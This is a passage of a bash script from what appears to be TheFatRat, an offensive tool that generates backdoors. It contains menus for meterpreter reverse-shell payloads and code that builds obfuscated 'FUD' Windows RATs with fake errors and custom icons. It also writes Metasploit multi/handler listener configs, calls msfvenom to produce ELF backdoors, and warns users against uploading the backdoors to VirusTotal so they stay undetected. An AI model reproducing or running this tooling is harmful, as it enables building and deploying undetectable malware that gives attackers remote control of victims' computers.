python/shell_reverse_tcp$orange |" - echo -e $orange " |$white [$okegreen 7$white ]$yellow python/meterpreter/reverse_tcp_ssl$orange |" - echo -e $orange " +------------------------------------------+" - echo "" - echo -ne $okegreen " Choose Payload : ";tput sgr0 - read pld - case $pld in - 1) - payload="python/meterpreter/reverse_tcp" - ;; - - 2) - payload="python/meterpreter/reverse_http" - ;; - - 3) - payload="python/meterpreter/reverse_https" - ;; - - 4) - payload="python/meterpreter_reverse_http" - ;; - - 5) - payload="python/meterpreter_reverse_https" - ;; - - 6) - payload="python/shell_reverse_tcp" - ;; - - 7) - payload="python/meterpreter/reverse_tcp_ssl" - ;; - - *) - echo "" - echo -e $red "Wrong input , choose between 1 and 7" - pldmul - ;; - esac -} - -#Microsploit Log File -msploitr(){ -rm -rf $msploit >/dev/null 2>&1 - touch $msploit - echo "**********************************************" > $msploit - echo "* Microsploit Log *" >> $msploit - echo "**********************************************" >> $msploit - echo " Metepreter Data " >> $msploit - echo "----------------------------------------------" >> $msploit -cat $meterp | while read LINE -do - echo $LINE >> $msploit -done - echo "----------------------------------------------" >> $msploit - echo " Xterm Output " >> $msploit - echo "----------------------------------------------" >> $msploit - -} - -#Checking if User is Root -[[ `id -u` -eq 0 ]] || { echo -e $red "Must be root to run script"; exit 1; } - resize -s 33 84 > /dev/null -clear - - -#If default Lhost & Lport configuration file exists then load their values to variables -if [ -f "${defcon}" ]; then - yourip=$(sed -n 1p ${defcon}) - yourport=$(sed -n 2p ${defcon}) -fi - -#Jangan Nakal CTRL C MULU -#Abort TheFatRat with Ctrl+C - -trap ctrl_c INT - -ctrl_c(){ -clear - echo -e $red"[*] (Ctrl + C ) Detected, Trying To Exit ..." - sleep 1 - echo "" - echo -e $red"[*] Stop all service , Wait ..." - Stop - echo "" - echo -e $yellow"[*] Thank You For Using TheFatRat =)." - echo "" - echo -e $yellow"[*] Check Dracos Linux LFS, Penetration OS From Indonesia =P." - exit -} - -#If first internet check with ping google hostname fails then run this next function to check what happens -function chknet(){ - echo -e $red "[X] Your Internet is not working correctly!" - sleep 0.5 - echo -e $cyan "[*] Checking ...." - ping -c 1 8.8.4.4 > /dev/null 2>&1 - png="$?" - if [ $png == "0" ]; then - echo -e $red "[X] Your linux OS is not able to resolve" - echo -e $red "hostnames over terminal using ping !!" - echo "" - echo -e $yellow "Search on the web : (unable to resolve hostnames ping) to find a solution" - echo "" - echo -e $okegreen "Fatrat will continue , but some of its functions may not work properly." - echo "" - echo -e $okegreen "Press [ENTER] key to continue" - read continue - cont - sleep 0.5 - elif [ $png == "1" ]; then - echo -e $yellow "You are connected to your local network but not to the web ." - echo -e $yellow "Check if your router/modem gateway is connected to the web ." - echo "" - echo -e $okegreen "Fatrat will continue , but some of its functions may not work properly." - echo "" - echo -e $okegreen "Press [ENTER] key to continue" - read continue - cont - sleep 0.5 - elif [ $png == "2" ]; then - echo -e $red "You are not connected to any network ." - echo "" - echo -e $okegreen "Fatrat will continue , but many of its functions will not work properly." - echo "" - echo -e $okegreen "Press [ENTER] key to continue" - read continue - cont - sleep 0.5 - fi -} - -cont(){ -# Check Apache if Exists -which apache2 > /dev/null 2>&1 - if [ "$?" -eq "0" ]; then - echo -e $okegreen [✔]::[Apache2 Server $distro ]: Installation found!; - else - echo -e $red [x]::[warning]:this script require apache2 to work ; - echo "" - echo -e $red [!]::Run setup.sh to install apache2 ; - echo "" - sleep 0.5 - exit 1 - fi -sleep 0.5 - -# check if ruby exists -which ruby > /dev/null 2>&1 - if [ "$?" -eq "0" ]; then - echo -e $okegreen [✔]::[Ruby]: Installation found!; - - else - echo -e $red [x]::[warning]:this script require ruby to work ; - echo "" - echo -e $red [!]::Run setup.sh to install ruby ; - echo "" - sleep 0.5 - exit 1 -fi -sleep 0.5 - -# check if apktool exists -which $apktool > /dev/null 2>&1 - if [ "$?" -eq "0" ]; then - echo -e $okegreen [✔]::[Apktool]: Installation found!; - else - echo -e $red [x]::[warning]:this script require apktool to work ; - echo "" - echo -e $red[!]::Run setup.sh to install apktool ; - echo "" - sleep 0.5 - exit 1 -fi -sleep 0.5 - -# check if aapt exists -which $aapt > /dev/null 2>&1 -if [ "$?" -eq "0" ]; then - echo -e $okegreen [✔]::[Aapt]: Installation found!; -else - echo -e $red [x]::[warning]:this script require aapt to work ; - echo "" - echo -e $red [!]::Run setup.sh to install aapt ; - echo "" - sleep 0.5 -exit 1 -fi -sleep 0.5 - -#another apache2 locate -if [ "$distro" = "Ubuntu" ]; then - apache2="/var/www" -elif [ "$distro" = "Kali" ]; then - apache2="/var/www/html" -elif [ "$distro" = "BackBox" ]; then - apache2="/var/www/html" -else - apache2="/var/www/html" -fi - -sleep 0.5 -# check msfconsole -which $msfconsole > /dev/null 2>&1 -if [ "$?" -eq "0" ]; then - echo -e $okegreen [✔]::[Msfconsole]: Installation found!; -else - echo -e $red [x]::[warning]:this script require msfconsole installed to work ; - echo "" - echo -e $red [!]::Run setup.sh to install metasploit-framework ; - sleep 0.5 -exit 1 -fi - -sleep 0.5 - -# check if msfvenom exists -which $msfvenom > /dev/null 2>&1 -if [ "$?" -eq "0" ]; then - echo -e $okegreen [✔]::[Msfvenom]: Installation found!; -else - - echo -e $red [x]::[warning]:this script require msfvenom installed to work ; - echo "" - echo -e $red [!]::Run setup.sh to install metasploit-framework ; - sleep 0.5 -exit 1 -fi -sleep 0.5 - -# check mingw if exists -which i586-mingw32msvc-gcc > /dev/null 2>&1 -if [ "$?" -eq "0" ]; then - echo -e $okegreen [✔]::[Mingw32]: Installation found!; - COMPILER="i586-mingw32msvc-gcc" -else - which x86_64-w64-mingw32-gcc > /dev/null 2>&1 - if [ $? -eq 0 ]; then - echo -e $okegreen [✔]::[Mingw64]: Installation found!; - COMPILER="x86_64-w64-mingw32-gcc" - else - echo -e $red [x]::[warning]:this script require mingw32 or 64 installed to work ; - echo "" - echo -e $red [!]::Run setup.sh to install mingw ; - sleep 0.5 - exit 1 - fi -fi -sleep 0.5 - - -# check backdoor-factory if exists -which $backdoor > /dev/null 2>&1 -if [ "$?" -eq "0" ]; then - echo -e $okegreen [✔]::[Backdoor-factory]: Installation found!; -else - echo -e $red [x]::[warning]:this script require backdoor-factory installed to work ; - echo "" - echo -e $red [!]::Run setup.sh to install backdoor-factory ; - echo "" - sleep 0.5 - exit 1 -fi - -sleep 0.5 - -# check monodevelop if exists -which mcs > /dev/null 2>&1 -if [ -d $find ]; then - echo -e $okegreen [✔]::[Monodevelop-Utils]: Installation found!; -else - echo -e $red [x]::[warning]:this script require monodevelop-utils to work ; - echo "" - echo -e $red [!]::Run setup.sh to install monodevelop-utils ; - echo "" - sleep 0.5 - exit 1 -fi -sleep 0.5 - -# check xterm if exists -which xterm > /dev/null 2>&1 -if [ -d $find ]; then - echo -e $okegreen [✔]::[Xterm]: Installation found!; -else - echo -e $red [x]::[warning]:this script require xterm to work ; - echo "" - echo -e $red [!]::Run setup.sh to install xterm ; - echo "" - sleep 0.5 - exit 1 -fi -sleep 0.5 - -# check gnome-terminal if exists -which gnome-terminal > /dev/null 2>&1 -if [ -d $find ]; then - echo -e $okegreen [✔]::[Gnome-terminal]: Installation found!; -else - echo -e $red [x]::[warning]:this script require gnome-terminal to work ; - echo "" - echo -e $red [!]::Run setup.sh to install gnome-terminal ; - echo "" - sleep 0.5 - exit 1 -fi -sleep 0.5 - -# Check upx if exists -which upx > /dev/null 2>&1 -if [ -d $find ]; then - echo -e $okegreen [✔]::[Upx]: Installation found!; -else - echo -e $red [x]::[warning]:this script require upx to work ; - echo "" - echo -e $red [!]::Run setup.sh to install upx ; - echo "" - sleep 0.5 - exit 1 -fi -sleep 0.5 - -# Check baksmali if exists -which baksmali > /dev/null 2>&1 -if [ -d $find ]; then - echo -e $okegreen [✔]::[Baksmali]: Installation found!; -else - echo -e $red [x]::[warning]:this script require Baksmali to work ; - echo "" - echo -e $red [!]::Run setup.sh to install baksmali ; - echo "" - sleep 0.5 - exit 1 -fi -sleep 1 -echo -e $okegreen [✔]::[Outputdir]: $output; -sleep 1 - -#WARNING !!! -resize -s 33 68 > /dev/null -clear -echo -e $red"" - echo " "; - echo "==================================================================" - echo " WARNING ! WARNING ! WARNING ! WARNING ! WARNING ! " - echo " YOU CAN UPLOAD OUTPUT/BACKDOOR FILE TO WWW.NODISTRIBUTE.COM " - echo "==================================================================" - echo " ____ _____ _____ _____ _____ _____ __ _____ _____ ____ "; - echo "| \| | | |_ _| | | | _ | | | | _ | \ "; - echo "| | | | | | | | | | | | | __| |__| | | | | | "; - echo "|____/|_____|_|___| |_| |_____|__| |_____|_____|__|__|____/ "; - echo " _____ _____ "; - echo " |_ _| | "; - echo " | | | | | "; - echo " |_| |_____| "; - echo " _____ _____ _____ _____ _____ _____ _____ _____ _____ __ "; - echo "| | | | __ | | | __| |_ _| |_ _| _ | | "; - echo "| | |- -| -| | |__ | | | | | | | | | | |__ "; - echo " \___/|_____|__|__|_____|_____| |_| |_____| |_| |__|__|_____| "; - echo "==================================================================" - echo " PLEASE DON'T UPLOAD BACKDOOR TO WWW.VIRUSTOTAL.COM " - echo " YOU CAN UPLOAD OUTPUT/BACKDOOR FILE TO WWW.NODISTRIBUTE.COM " - echo "==================================================================" -echo "" -echo -n "Press [Enter] key to continue .............." -read warning - -############################## -#CHECKING POSTGRESQL -############################# -if ps ax | grep -v grep | grep postgresql > /dev/null -then - clear - resize -s 33 84 > /dev/null - echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::" - echo -e $white":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::" - echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::" - echo -e $lightgreen"" - echo " ___________ _ _______________ ___ __ ___ ___ _______ _______"; - echo " / __/ __/ _ \ | / / _/ ___/ __/ / _ \/ / / / |/ / |/ / _/ |/ / ___/"; - echo " _\ \/ _// , _/ |/ // // /__/ _/ / , _/ /_/ / / // // / (_ / "; - echo "/___/___/_/|_||___/___/\___/___/ /_/|_|\____/_/|_/_/|_/___/_/|_/\___/ "; - echo " "; - echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::" - echo -e $white":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::" - echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::" - sleep 0.5 - -else - resize -s 33 73 > /dev/null - clear - echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::" - echo -e $white"::::::::::::::::::::$white "Metasploit service is not running"$white ::::::::::::::::::" - echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::" - echo "" - echo -e $white " /) " - echo " // " - echo " (( " - echo " // " - echo " .-. // .-. " - echo " / \- ((=-/ \ " - echo " \ \ / " - echo " -( ___ ))__)- " - echo " .-' // '-. " - echo " / (( \ " - echo " | * | " - echo " \ / " - echo " \ |_w_| / " - echo " _) \ / (_ " - echo " jgs (((---' '---))) " - echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::" - echo -e $white":::::::::::::::: Wait for starting a Service Postgresql ::::::::::::::::" - echo -e $cyan":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::" -fi - -#Started Service postgresql & apache -if [ "$distro" = "Kali" ]; then - /etc/init.d/postgresql start > /dev/null 2>&1 - /etc/init.d/metasploit start > /dev/null 2>&1 - /etc/init.d/apache2 start > /dev/null 2>&1 -else - /etc/init.d/postgresql start > /dev/null 2>&1 - /etc/init.d/metasploit start > /dev/null 2>&1 - /etc/init.d/apache2 start > /dev/null 2>&1 -fi - read -p "Press [Enter] key to Continue..." - clear -} - -######################### -#CHECK DEPENDICIES -######################### -clear -echo -e $cyan" ____ _ _ _ " -echo " / ___| |__ ___ ___| | _(_)_ __ __ _ " -echo " | | | '_ \ / _ \/ __| |/ / | '_ \ / _\ | " -echo " | |___| | | | __/ (__| <| | | | | (_| | _ _ _ " -echo " \____|_| |_|\___|\___|_|\_\_|_| |_|\__/ | (_) (_) (_)" -echo " |___/ " -echo -e $lightgreen'-- -- +=[(c) 2016-2017 | dracos-linux.org | Linuxsec.org | Hacker Indonesia ' -echo -e $cyan'-- -- +=[ Author: Screetsec < Edo Maland > ]=+ -- -- ' -echo -e " " - -if [ $(id -u) != "0" ]; then - - echo -e $red [!]::[Check Dependencies] ; - sleep 0.5 - echo -e $red [✔]::[Check User]: $USER ; - echo -e $red [✔]::[Distro]: $distro ; - echo -e $red [✔]::[Release]: $rlname ; - sleep 0.5 - echo -e $red [x]::[not root]: you need to be [root] to run this script.; - echo "" - sleep 1 - exit -else - - echo -e $okegreen [!]::[Check Dependencies]: ; - sleep 0.5 - echo -e $okegreen [✔]::[Distro]: $distro ; - echo -e $okegreen [✔]::[Release]: $rlname ; - echo -e $okegreen [✔]::[Check User]: $USER ; - -sleep 0.5 -fi - -#Checking if user is using a local terminal or a remote shell -if [ -n "$SSH_CLIENT" ] || [ -n "$SSH_TTY" ]; then - echo -e $red [✔]::[Terminal]: remote ; - echo "" - echo -e $red "Fatrat & Setup does not work over a remote secure shell ." - echo "" - echo -e $green "If you want to Install Fatrat on a remote computer then " - echo -e $green "use a remote desktop connection like (rdesktop) or (vnc) " - echo "" - echo -e $green "Press [ENTER] key to exit" - read abor - exit 1 -else -sleep 0.5 - echo -e $okegreen [✔]::[Terminal]: local ; - case $(ps -o comm= -p $PPID) in - sshd|*/sshd) SESSION_TYPE=remote/ssh;; - esac -fi -sleep 0.5 - -#Checking internet connection by connecting to google over http -#case fails then run chknet function (ping) - -echo -e "GET http://google.com HTTP/1.0\n\n" | nc google.com 80 > /dev/null 2>&1 - -if [ $? -ne 0 ]; then - echo -e $red [ X ]::[Internet Connection]: OFFLINE!; - chknet - sleep 1 -else - echo -e $okegreen [✔]::[Internet Connection]: CONNECTED!; - sleep 1 - cont -fi - - -function Stop(){ - -#Stoped Service postgresql & apache - -if [ "$distro" = "Kali" ]; then - /etc/init.d/postgresql stop > /dev/null 2>&1 - /etc/init.d/metasploit stop > /dev/null 2>&1 - /etc/init.d/apache2 stop > /dev/null 2>&1 -else - /etc/init.d/metasploit stop > /dev/null 2>&1 - /etc/init.d/apache2 stop > /dev/null 2>&1 - /etc/init.d/postgresql stop > /dev/null 2>&1 -fi - -} - -function pstagef() { - -# Powerstager file will be stored in main fatrat directory -# Checking if file was created - -fout="$output" -if [ -f $fstager ]; then - echo "" - echo -e $red "[✔] Your FUD Rat file was created succefully" - spinlong - sleep 2 -else - echo -e $red "" - echo " [x] There was an error creating your FUD rat with Powerstager ." - echo -e $okegreen "" - echo "Press [ENTER] key to continue to return to fatrat menu" - read rmenu - clear - menu -fi - -# File was created , now checking if file name exists in final output directory -# In case there is already a file in output dir with same name , then rename it - -ren=`shuf -i 1-1000 -n 1` -chk="$output/$fira.exe" - -if [ -f "$chk" ]; then - mv $chk $output/old_$ren.exe >> $logfud 2>&1 - echo -e $yellow " " - echo " [!] FatRat Detected that you already had a previous created FUD" - echo "file in ($output/) with the name $fira.exe ." - echo -e $okegreen "" - echo " [✔] FatRat have renamed your old FUD Rat to old_$ren.exe" - echo "" - echo -e $cyan "[*] You can find your file in :$output/old_$ren.exe" -else - mv $fstager $output/$fira.exe >> $logfud 2>&1 - echo "" - echo -e $cyan "[*] You can find your file in : - $chk" - echo "" -fi - -#Option to create a listener - -echo "" -echo -e $okegreen "Do you want to create a listener for this configuration" -echo -e $okegreen "to use in msfconsole in future ?" -echo "" -echo -ne "Choose y/n : ";tput sgr0 -read sel - case $sel in - y|Y|yes|Yes|YES) - echo "" - echo -e $green "Write the name for this config . (ex : pstager)" - echo -ne "Filename : ";tput sgr0 - read fname - - # Checking if user compiled a 32bit or 64bit ese in powerstager - if [ $met == "32" ] #32bit exe created - then - #checking if user wrote any input for listener name - if [ -z $fname ]; then - svf=$path/config/listeners/pstager32.rc - rm -rf $svf >/dev/null 2>&1 - echo "use exploit/multi/handler" > $svf - echo "set PAYLOAD windows/meterpreter/reverse_tcp" >> $svf - echo "set LHOST $yourip" >> $svf - echo "set LPORT $yourport" >> $svf - echo "exploit -j" >> $svf - echo -e $okegreen "" - echo "Configuration file saved to $list/pstager32.rc" - echo "" - else - svf=$path/config/listeners/$fname.rc - rm -rf $svf >/dev/null 2>&1 - echo "use exploit/multi/handler" > $svf - echo "set PAYLOAD windows/meterpreter/reverse_tcp" >> $svf - echo "set LHOST $yourip" >> $svf - echo "set LPORT $yourport" >> $svf - echo "exploit -j" >> $svf - echo -e $okegreen "" - echo "Configuration file saved to $list/$fname.rc" - echo "" - fi - - elif [ $met == "64" ]; then #64bit exe created - if [ -z $fname ]; then - #User did not wrote any input for the listener , then write default name - svf=$path/config/listeners/pstager64.rc - rm -rf $svf >/dev/null 2>&1 - echo "use exploit/multi/handler" > $svf - echo "set PAYLOAD windows/x64/meterpreter/reverse_tcp" >> $svf - echo "set LHOST $yourip" >> $svf - echo "set LPORT $yourport" >> $svf - echo "exploit -j" >> $svf - echo -e $okegreen "" - echo "Configuration file saved to $list/pstager64.rc" - echo "" - else - #user wrote a name for the listener - svf=$path/config/listeners/$fname.rc - rm -rf $svf >/dev/null 2>&1 - echo "use exploit/multi/handler" > $svf - echo "set PAYLOAD windows/x64/meterpreter/reverse_tcp" >> $svf - echo "set LHOST $yourip" >> $svf - echo "set LPORT $yourport" >> $svf - echo "exploit -j" >> $svf - echo -e $okegreen "" - echo "Configuration file saved to $list/$fname.rc" - echo "" - fi - fi - ;; - - n|N|no|No|NO) - - # No MSFCONSOLE configuration option selected - echo "" - ;; - - *) - echo "Wrong input " - echo "No configuration created ." - echo "" - ;; - esac - -echo "" -echo -e $okegreen "Press [ENTER] key to return to FUDWIN menu" -read fwin -fudwin - -} - -function fudwin(){ -rm -rf $logfud > /dev/null 2>&1 - touch $logfud > /dev/null 2>&1 - clear - echo -e $okegreen " _______ ___ ___ ______ ___ ___ ___ ______ " - echo -e $okegreen " | _ | Y | _ \ | Y | | _ \ " - echo -e $okegreen " |. 1___|. | |. | \|. | |. |. | |" - echo -e $okegreen " |. __) |. | |. | |. / \ |. |. | |" - echo -e $okegreen " |: | |: 1 |: 1 |: |: |: | |" - echo -e $okegreen " |::.| |::.. . |::.. . /|::.|:. |::.|::.| |" - echo -e $okegreen " --- ------- ------ --- --- --- --- --- $cyan 1.0" - - echo -e $cyan "" - echo -e $cyan "Select one tool to create your Windows EXE FUD Rat " - echo -e $cyan "" - echo "" - echo -e $white "[$okegreen 1$white ]$okegreen -$yellow Powerstager 0.2.5 by z0noxz (powershell) $okegreen(NEW)" - echo -e $white "[$okegreen 2$white ]$okegreen -$yellow Slow But Powerfull $okegreen(OLD)" - echo -e $white "[$okegreen 3$white ]$okegreen -$yellow Return to menu" - echo "" - echo -e $okegreen" ┌─["$red"TheFatRat$okegreen]──[$red~$okegreen]─["$yellow"FUDWIN$okegreen]:" - echo -ne $okegreen" └─────► " ;tput sgr0 - read fwin - case $fwin in - 1) - echo "" - spinlong - echo -e $okegreen "\n" - echo -e $yellow " Your local IPV4 address is : $lanip" - echo -e $yellow " Your local IPV6 address is : $lanip6" - echo -e $yellow " Your public IP address is : $publicip" - echo -e $yellow " Your Hostname is : $hostn" - echo -e $okegreen"" - - #Case default lhost & lport config file does not exist then fill variables with "" - if [ ! -f "$defcon" ]; then - yourip="" - yourport="" - fi - - # If variable ip is empty (no default config) then popup user input - if [ -z "$yourip" ]; then - read -p ' Set LHOST IP: ' yourip - fi - - # If variable local port is empty (no default config) then popup user input - echo -e $okegreen "" - if [ -z "$yourport" ]; then - read -p ' Set LPORT: ' yourport - fi - - echo "" - read -p ' Please enter the base name for output files(App.exe) : ' fira - #Go make a check if user inputed any value or not - invalid - - if [[ -f "$fira" ]]; then - echo "Filename already exists , choose another name" - sleep 5 - fudwin - elif [[ -d "$fira" ]]; then - echo "There is a directory with that name , choose another name" - sleep 5 - fudwin - fi - -#From invalid , a variable will return with 0 or 1 , if 1 then abort & return to fudwin menu - if [ $err == "1" ]; then - echo -e $okegreen "" - echo -n "Press [ENTER] key to return to menu ." - read inp - fudwin - fi - -#check if ming64 exists and provide 32bit or 64bit option to create rat -which x86_64-w64-mingw32-gcc >> $logfud 2>&1 - if [ "$?" -eq "0" ]; then - spinlong - echo "" - echo -e $yellow " Select Windows Architeture target" - echo "" - echo -e $cyan " 1 -$okegreen 32Bit (XP,7,Vista)" - echo -e $cyan " 2 -$okegreen 64Bit (XP64,Vista,7,8,10)" - echo "" - echo -ne $lightgreen "Choose (1,2) : " - read choice - if [ $choice == "1" ]; then - spinlong - echo "" - icfold="$path/icons" - lit=`ls -1 $icfold/*.ico 2>/dev/null | wc -l` - if [ $lit != 0 ]; then - echo -e $orange " +--------------------+" - echo -e $orange " |$okegreen Current icons list$orange |" - echo -e $orange " +--------------------+" - for liste in icons/*.ico; do - echo ${liste##*/} | sed 's/^/ /g' - done - echo -e $orange " +---------------------+" - echo "" - echo -e $okegreen " Write the icon name from the list to add to your backdoor EXE or press [ENTER] key for default icon" - echo "" - echo -ne " Filename : ";tput sgr0 - read fname -fi - -if [ -z $fname ]; then - echo "" - echo -e $red "No file name was written" - echo "" - echo -e $okegreen "Building EXE with default icon" - spinlong - echo "" - echo -e $red "[*] Builing your powerstage rat for windows with the following values" - echo "" - echo -e $yellow " Target :$okegreen Windows 32 Bit" - echo -e $yellow " Your IP/Host :$okegreen $yourip" - echo -e $yellow " Your Port :$okegreen $yourport" - echo -e $yellow " Rat Filename :$okegreen $fira" - fstager=$path/$fira - echo - echo -e $red "[*] Starting the creation of your FUD 32bit Exe" - sleep 4 - python3 $pstager --target win32 --meterpreter --lhost $yourip --lport $yourport --fake-error --obfuscation --output $fira >> $logfud 2>&1 - #Create a var with 32 = 32bit , so pstagef function know which listener configutation must be written (in case selected) - met="32" - pstagef -fi - -if [ ! -f $icfold/$fname ]; then - echo "" - echo -e $red "The Filename you wrote does not exist in icons folder." - echo "" - echo -e $okegreen "Building EXE with default icon" - spinlong - echo "" - echo -e $red "[*] Builing your powerstage rat for windows with the following values" - echo "" - echo -e $yellow " Target :$okegreen Windows 32 Bit" - echo -e $yellow " Your IP/Host :$okegreen $yourip" - echo -e $yellow " Your Port :$okegreen $yourport" - echo -e $yellow " Rat Filename :$okegreen $fira" - fstager=$path/$fira - echo - echo -e $red "[*] Starting the creation of your FUD 32bit Exe" - sleep 4 - python3 $pstager --target win32 --meterpreter --lhost $yourip --lport $yourport --fake-error --obfuscation --output $fira >> $logfud 2>&1 - #Create a var with 32 = 32bit , so pstagef function know which listener configutation must be written (in case selected) - met="32" - pstagef -else - echo "" - spinlong - echo "" - echo -e $red "[*] Builing your powerstage rat for windows with the following values" - echo "" - echo -e $yellow " Target :$okegreen Windows 32 Bit" - echo -e $yellow " Your IP/Host :$okegreen $yourip" - echo -e $yellow " Your Port :$okegreen $yourport" - echo -e $yellow " Rat Filename :$okegreen $fira" - echo -e $yellow " Icon filename :$okegreen $fname" - fstager=$path/$fira - echo - echo -e $red "[*] Starting the creation of your FUD 32bit Exe" - python3 $pstager --target win32 --meterpreter --lhost $yourip --lport $yourport --fake-error --obfuscation --icon $icfold/$fname --output $fira >> $logfud 2>&1 - met="32" - pstagef -fi - -elif [ $choice == "2" ]; then - echo "" - spinlong - echo "" - icfold="$path/icons" - lit=`ls -1 $icfold/*.ico 2>/dev/null | wc -l` - if [ $lit != 0 ]; then - echo -e $orange " +--------------------+" - echo -e $orange " |$okegreen Current icons list$orange |" - echo -e $orange " +--------------------+" - for liste in icons/*.ico; do - echo ${liste##*/} | sed 's/^/ /g' - done - echo -e $orange " +---------------------+" - echo "" - echo -e $okegreen " Write the icon name from the list to add to your backdoor EXE or press [ENTER] key for default icon" - echo "" - echo -ne " Filename : ";tput sgr0 - read fname -fi - -if [ -z $fname ]; then - echo "" - echo -e $red "No file name was written" - echo "" - echo -e $okegreen "Building EXE with default icon" - spinlong - echo "" - echo -e $okegreen "[*] Builing your powerstage rat for windows with the following values" - echo "" - echo -e $yellow " Target :$okegreen Windows 64 Bit" - echo -e $yellow " Your IP/Host :$okegreen $yourip" - echo -e $yellow " Your Port :$okegreen $yourport" - echo -e $yellow " Rat Filename :$okegreen $fira" - fstager=$path/$fira - python3 $pstager --target win64 --meterpreter --lhost $yourip --lport $yourport --fake-error --obfuscation --output $fira >> $logfud 2>&1 - #Create a var with 64 = 64bit , so pstagef function know which listener configutation must be written (in case selected) - met="64" - pstagef -fi - -if [ ! -f $icfold/$fname ]; then - echo "" - echo -e $red "The Filename you wrote does not exist in icons folder." - echo "" - echo -e $okegreen "Building EXE with default icon" - spinlong - echo -e $red "[*] Builing your powerstager rat for windows with the following values" - echo "" - echo -e $yellow " Target :$okegreen Windows 64 Bit" - echo -e $yellow " Your IP/Host :$okegreen $yourip" - echo -e $yellow " Your Port :$okegreen $yourport" - echo -e $yellow " Rat Filename :$okegreen $fira" - fstager=$path/$fira - python3 $pstager --target win64 --meterpreter --lhost $yourip --lport $yourport --fake-error --obfuscation --output $fira >> $logfud 2>&1 - #Create a var with 64 = 64bit , so pstagef function know which listener configutation must be written (in case selected) - met="64" - pstagef -else - echo "" - spinlong - echo "" - echo -e $red "[*] Builing your powerstage rat for windows with the following values" - echo "" - echo -e $yellow " Target :$okegreen Windows 64 Bit" - echo -e $yellow " Your IP/Host :$okegreen $yourip" - echo -e $yellow " Your Port :$okegreen $yourport" - echo -e $yellow " Rat Filename :$okegreen $fira" - echo -e $yellow " Icon filename :$okegreen $fname" - fstager=$path/$fira - echo "" - python3 $pstager --target win64 --meterpreter --lhost $yourip --lport $yourport --fake-error --obfuscation --icon $icfold/$fname --output $fira >> $logfud 2>&1 - #Create a var with 64 = 64bit , so pstagef function know which listener configutation must be written (in case selected) - met="64" - pstagef -fi - else - fudwin - fi - fi - ;; -2) -#slowbutpowerfull selection - chmod +x powerfull.sh - xterm -fa monaco -fs 13 -bg black ./powerfull.sh - clear - menu - ;; -3) - clear - menu -;; -*) - clear - echo -e $red " Incorrect Number" - echo "" - sleep 2 - fudwin - ;; - esac -} - -function cmsfvenom() { -clear -echo -e $okegreen" ===================================================================== " -echo -e " | $cyan Create Payload with msfvenom ( must install msfvenom ) $okegreen | " -echo -e $okegreen" ===================================================================== " -echo -e $red" ___________ " -echo -e " | |======[*** $yellow ____ _ " -echo -e $red" | $yellow MSFVENOM $red \ $yellow / ___|_ __ ___ ____| |_ ___ _ __ " -echo -e $red" |_____________\_______ $yellow | | | '__/ _ \/ _ | __/ _ \| '__|" -echo -e $red" |==[v1.3 >]===========\ $yellow | |___| | | __/ (_| | || (_) | | " -echo -e $red" |______________________\ $yellow \____|_| \___|\____|\__\___/|_| " -echo -e $yellow" \(@)(@)(@)(@)(@)(@)(@)/ " -echo -e $red" ********************* " -echo "" -echo -e $okegreen" ===================================================================== " -echo -e " | $cyan Created by $red Edo Maland ( Screetsec ) $okegreen | " -echo -e $okegreen" ===================================================================== " -echo "" - echo -e $okegreen " [1] LINUX >> FatRat.elf" - echo -e $okegreen" [2] WINDOWS >> FatRat.exe" - echo -e $okegreen" [3] SIGNED ANDROID >> FatRat.apk" - echo -e $okegreen" [4] MAC >> FatRat.macho" - echo -e $okegreen" [5] PHP >> FatRat.php" - echo -e $okegreen" [6] ASP >> FatRat.asp" - echo -e $okegreen" [7] JSP >> FatRat.jsp" - echo -e $okegreen" [8] WAR >> FatRat.war" - echo -e $okegreen" [9] Python >> FatRat.py " - echo -e $okegreen" [10] Bash >> FatRat.sh" - echo -e $okegreen" [11] Perl >> FatRat.pl" - echo -e $okegreen" [12] doc >> Microsoft.doc "$yellow"( not macro attack )" - echo -e $okegreen" [13] rar >> bacdoor.rar "$yellow"( Winrar old version)" - echo -e $okegreen" [14] dll >> FatRat.dll" - echo -e $okegreen" [15] Back to Menu " - echo -e " " - echo -e $okegreen" ┌─["$red"TheFatRat$okegreen]──[$red~$okegreen]─["$yellow"creator$okegreen]:" - echo -ne $okegreen" └─────► " ;tput sgr0 - read fatrat1 - if test $fatrat1 == '1' - then - echo "" - spinlong - # Show user current lanip , public ip & current hostname - echo -e $okegreen"\n" - echo -e $yellow " Your local IPV4 address is : $lanip" - echo -e $yellow " Your local IPV6 address is : $lanip6" - echo -e $yellow " Your public IP address is : $publicip" - echo -e $yellow " Your Hostname is : $hostn" - echo -e $okegreen"" - -#checking if default lhost & lport config exists -# If config does not exists then set lhost & lport values to no value - - if [ ! -f "$defcon" ] - then - yourip="" - yourport="" - fi - -#If lhost & lport values are null then popup user manual input - - if [ -z "$yourip" ]; then - read -p ' Set LHOST IP: ' yourip - fi - echo -e $okegreen "" - - if [ -z "$yourport" ]; then - read -p ' Set LPORT: ' yourport - fi - echo - read -p ' Please enter the base name for output files : ' fira - -# Checking if user filled lhost , lport & filename with any input -# Case any of these inputs are blank then "invalid" function will popup a message to user -# and will return to msfvenom menu - - invalid - if [ $err == "1" ] - then - echo -e $okegreen "" - echo -n "Press [ENTER] key to return to menu ." - read inp - cmsfvenom - fi - pldlnx - spinlong - echo "" - echo "" - gboor - spinlong - echo "" - echo "" - $msfvenom -p $payload LHOST=$yourip LPORT=$yourport -f elf > $output/$fira.elf - -# Checking if file was created - fileout="$output/$fira.elf" - if [ ! -f "$fileout" ] - then - echo -e $red "" - echo "There was an error in the creation of your rat file" - echo -e $okegreen "" - echo -ne "Press [ENTER] key to return to menu ." - read cont - cmsfvenom - else - echo -e $okegreen "" - echo "Your rat file was created and it is stored in : $output/$fira.elf" - echo "" - echo -ne "Press [ENTER] key to return to menu ." - read cont - cmsfvenom - fi - - elif test $fatrat1 == '2' - then - - echo "" - spinlong - 